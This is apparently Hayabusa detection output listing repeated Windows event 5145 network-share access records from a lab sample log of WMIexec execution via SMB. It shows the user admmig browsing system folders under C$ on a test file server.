0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom\Custom64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\en-US | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppReadiness | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\desktop.ini | IP Addr: 10.23.23.9 
| LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources | IP Addr: 10.23.23.9 | LID: 